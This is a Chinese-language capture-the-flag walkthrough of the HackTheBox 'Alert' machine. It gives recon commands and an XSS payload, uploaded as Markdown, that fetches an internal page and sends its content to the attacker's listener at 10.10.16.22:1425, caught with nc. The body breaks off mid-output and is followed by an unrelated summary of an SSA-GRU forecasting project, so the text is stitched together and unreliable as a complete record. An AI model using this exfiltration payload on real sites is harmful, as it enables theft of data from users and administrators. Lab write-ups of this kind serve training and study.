HTB:Alert[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用ffuf对alert.htb域名进行子域名FUZZ

使用gobuster对alert.htb域名进行路径FUZZ

边界突破

使用curl访问/messages.php文件

使用浏览器直接访问alert.htb域名

再次构造一个XSS脚本,访问/messages.php文件并将响应结果传输回攻击机

本地侧netcat监听后成功收到回显

读取Apache的配置文件,其默认路径为:/etc/apache2/sites-available/000-default.conf

使用john通过字典爆破该密码哈希

使用ssh通过上述凭证登录靶机

权限提升

查看靶机内部网络连接

攻击机使用chisel开始监听反向连接

通过代理chisel的1080端口,访问该服务

进入该WebAPP目录下,查看文件权限分配情况

直接通过php代码使其执行系统命令追加一个root用户

在攻击机中使用浏览器或curl访问该文件


连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.44

靶机Domain:alert.htb


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a alert.htb -r 1-65535 --ulimit 5000 | tee res

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p22,80 -sCV -Pn alert.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p22,80 --script=vuln -O -Pn alert.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn alert.htb

使用ffuf对alert.htb域名进行子域名FUZZ

ffuf -u http://alert.htb -H 'Host: FUZZ.alert.htb' -w ../dictionary/subdomains-top20000.txt -t 50 -fw 20

使用gobuster对alert.htb域名进行路径FUZZ

gobuster dir -u http://alert.htb -w ../dictionary/Common-dir.txt -x php,txt -t 50


边界突破

使用curl访问/messages.php文件

curl -v http://alert.htb/messages.php

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://alert.htb/messages.php
* Host alert.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.44
*   Trying 10.10.11.44:80...
* Connected to alert.htb (10.10.11.44) port 80
* using HTTP/1.x
> GET /messages.php HTTP/1.1
> Host: alert.htb
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sun, 02 Feb 2025 13:47:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 1
< Content-Type: text/html; charset=UTF-8
<

* Connection #0 to host alert.htb left intact

  • 由回显可见,虽然响应码为200但并未返回任何实质内容,应该存在访问白名单

使用浏览器直接访问alert.htb域名

  • 可见,该页允许上传一个.md文件,因此我尝试XSS反弹
<script>
alert(1)
</script>
  • 上传至靶机后,由弹窗可知该JS代码被成功解析

再次构造一个XSS脚本,访问/messages.php文件并将响应结果传输回攻击机

<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.22:1425/?file_content=" + encodeURIComponent(data));});
</script>
  • 上传至靶机后,点击右下角的Share Markdown获得该文件URL

  • 回到主界面,找到上方的Contact Us

  • 将URL发送至靶机支持团队

本地侧netcat监听后成功收到回显
nc -lvnp 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                             
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.4

内容概要:本文介绍了基于Python实现的SSA-GRU(麻雀搜索算法优化门控循环单元)时间序列预测项目。项目旨在通过结合SSA的全局搜索能力和GRU的时序信息处理能力,提升时间序列预测的精度和效率。文中详细描述了项目的背景、目标、挑战及解决方案,涵盖了从数据预处理到模型训练、优化及评估的全流程。SSA用于优化GRU的超参数,如隐藏层单元数、学习率等,以解决传统方法难以捕捉复杂非线性关系的问题。项目还提供了具体的代码示例,包括GRU模型的定义、训练和验证过程,以及SSA的种群初始化、迭代更新策略和适应度评估函数。; 适合人群:具备一定编程基础,特别是对时间序列预测和深度学习有一定了解的研究人员和技术开发者。; 使用场景及目标:①提高时间序列预测的精度和效率,适用于金融市场分析、气象预报、工业设备故障诊断等领域;②解决传统方法难以捕捉复杂非线性关系的问题;③通过自动化参数优化,减少人工干预,提升模型开发效率;④增强模型在不同数据集和未知环境中的泛化能力。; 阅读建议:由于项目涉及深度学习和智能优化算法的结合,建议读者在阅读过程中结合代码示例进行实践,理解SSA和GRU的工作原理及其在时间序列预测中的具体应用。同时,关注数据预处理、模型训练和优化的每个步骤,以确保对整个流程有全面的理解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

x0da6h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值